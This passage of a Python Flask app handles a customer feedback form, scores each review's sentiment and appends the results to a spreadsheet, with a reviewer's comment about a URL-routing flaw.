    # output_scenti / appendexcel come from the star-imported local modules.
    reviewrate = output_scenti(review)
    appendexcel(name, rating, review, reviewrate)
    return redirect(url_for('thanks'))


@app.route('/feedbackform', methods=['POST'])
def feedbackform():
    """Receive the feedback form and forward its fields to the success route."""
    # NOTE(review): the free-text review is placed in the URL path; a '/' in
    # the text will break routing -- consider handling it in the POST instead.
    if request.method == 'POST':
        cname = request.form.get("cuname", None)
        ctext = request.form.get("cure", None)
        crating = request.form.get("rate", None)
        return redirect(url_for('success', name=cname, rating=crating, review=ctext))


if __name__ == '__main__':
    app.run(debug=True)
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.